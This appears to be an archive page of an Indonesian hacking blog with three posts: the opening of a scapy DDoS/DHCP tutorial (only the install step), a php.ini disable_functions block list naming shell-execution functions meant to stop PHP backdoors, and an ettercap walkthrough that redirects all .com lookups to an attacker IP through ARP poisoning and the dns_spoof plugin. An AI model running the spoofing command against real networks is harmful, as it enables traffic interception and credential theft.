Archive for the ‘Hacking’ Category

ddos ip dan dhcp with scapy

Posted: Februari 2, 2012 in Hacking

oleh Ade ‘surya’ Andrial crew http://ophrack3rz.acehlinux.org/

1. Install perlengkapan scapy:
— aptitude install python-scapy

root@harubirukill:/home/surya# aptitude install python-scapy
The following NEW packages will be installed:
python-scapy
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 226 kB of archives. After unpacking 1,192 kB will be used.
Get:1 http://ftp.us.debian.org/debian/ squeeze/main python-scapy all 2.1.0-1 [226 kB]
Fetched 226 kB in 7s (30.5 kB/s)
Selecting previously deselected package python-scapy. (lebih…)

oleh Chliz Aceh @AcehCyber Team’s

hehehee
tambahkan script dibawah ini di file “php.ini” kamu, jika belum ada, silahkan buat dengan nama tersebut
supaya melindungi server anda dari pelaksanaan Shell/backdoor

Code :

” disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connectsafe_mode = Onregister_globals = Offdisplay_errors = Offallow_url_fopen = Offallow_url_include = Offenable open_basedir(set it to webroot path) “

Dan ubah permsion dari php.ini tidak Satu Dapat yg dapat Mengubahnya kecuali Admin
Moga bermanfaat 🙂
Enjoy

ACT-CREW

Ettercap – DNS Spoofing Again

Posted: Januari 9, 2012 in Hacking

oleh Ade ‘surya’ Andrial

sedikit lama untuk meload lagi blog ini, maap karena rada sok sibuk. hehehhe
setelah kemarin kemarin sudah dibahas juga tentang dns spoofing sekarang kita coba bahas lagi dengan trik lain.
silahkan langsung masuk pada direktori.

/usr/local/share/ettercap/etter.dns
kita akan mengedit file etter.dns

#redirect domain *.com to ip 172.18.2.150 (attacker)
*.com A 172.18.2.150
nah edit bagian ini ..*.com A 172.18.2.150

ketika nanti kita dns spoofing maka redirect nya ke ip *.com  A 172.18.2.150

root@harubirukill:~# ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /172.18.2.1/ //

nah perintanya sperti itu nah kenapa kita edit bagian dnsnya.ketika object yg kita serang maka object tersebut akan ter redirect ip dia ke dns tersebut ,nah di ettercap sendiri tersedia beberapa plugins
ettercap itu sangat bagus buat pentest jaringan di debian…
*.com A 172.18.2.150———–>
coba edit bagian ini biar ip yg kita spoofing redirect ke kompi kita…
mis: *.com A 192.168.1.2

oke sekian dulu..
wassalam..